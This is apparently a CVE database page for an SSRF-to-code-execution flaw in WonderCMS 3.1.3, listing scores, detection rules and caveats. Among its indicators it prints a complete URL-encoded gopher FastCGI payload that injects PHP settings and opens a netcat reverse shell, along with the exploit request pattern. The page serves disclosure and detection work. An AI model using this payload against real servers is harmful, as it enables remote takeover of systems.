cbcvebase.
CVE-2020-35313
published 2021-04-20

CVE-2020-35313: A server-side request forgery (SSRF) vulnerability in the addCustomThemePluginRepository function in index.php in WonderCMS 3.1.3 allows remote attackers to…

PriorityP270critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
45.22%
98.6th percentile
A server-side request forgery (SSRF) vulnerability in the addCustomThemePluginRepository function in index.php in WonderCMS 3.1.3 allows remote attackers to execute arbitrary code via a crafted URL to the theme/plugin installer.

Affected

1 ranges
VendorProductVersion rangeFixed in
wondercmswondercms

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://wonder.com/loginURL
path/index.php
commandgopher://127.0.0.1:9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2503CONTENT_LENGTH132%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2517SCRIPT_FILENAME/usr/share/php/PEAR.php%250D%2501DOCUMENT_ROOT/%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2584%2504%2500%253C%253Fphp%2520system%2528%2527rm%2520/tmp/f%253Bmkfifo%2520/tmp/f%253Bcat%2520/tmp/f%257C/bin/sh%2520-i%25202%253E%25261%257Cnc%2520{}%2520{}%2520%253E/tmp/f%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500
url?installThemePlugin=<payload>&type=plugins&token=<token>
port9000
  • Monitor HTTP GET requests to index.php containing the query parameter 'installThemePlugin' with a gopher:// scheme URI, which is the attack delivery vector for this SSRF-to-RCE chain.
  • Detect outbound or loopback gopher:// scheme requests targeting 127.0.0.1:9000, indicative of SSRF abuse against a local FastCGI (PHP-FPM) listener.
  • Alert on the presence of the string 'Made-by-SpyD3r' in HTTP request bodies or URL-encoded payloads, which is a unique marker embedded in the FastCGI exploit payload.
  • Detect FastCGI PHP_VALUE injection attempts setting 'allow_url_include = On' and 'auto_prepend_file = php://input', which enables arbitrary PHP code execution via the gopher SSRF payload.
  • The exploit requires an authenticated session; monitor for POST login attempts to WonderCMS followed immediately by GET requests with 'installThemePlugin' parameter as a behavioral chain indicator.
  • The vulnerable function is addCustomThemePluginRepository in index.php; audit WAF/application logs for unsanitized URL values passed to the theme/plugin installer endpoint.
  • ·The gopher-based FastCGI payload hardcodes SCRIPT_FILENAME as /usr/share/php/PEAR.php; this path must exist on the target system for the RCE stage to succeed. Targets without PEAR installed at this path will not be exploitable via this specific payload.
  • ·Exploitation requires FastCGI (PHP-FPM) to be listening on localhost port 9000. Environments using a Unix socket or a non-default port will not be vulnerable to this specific exploit chain.
  • ·The exploit requires valid CMS credentials; unauthenticated attackers cannot trigger the SSRF directly. Credential compromise is a prerequisite.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.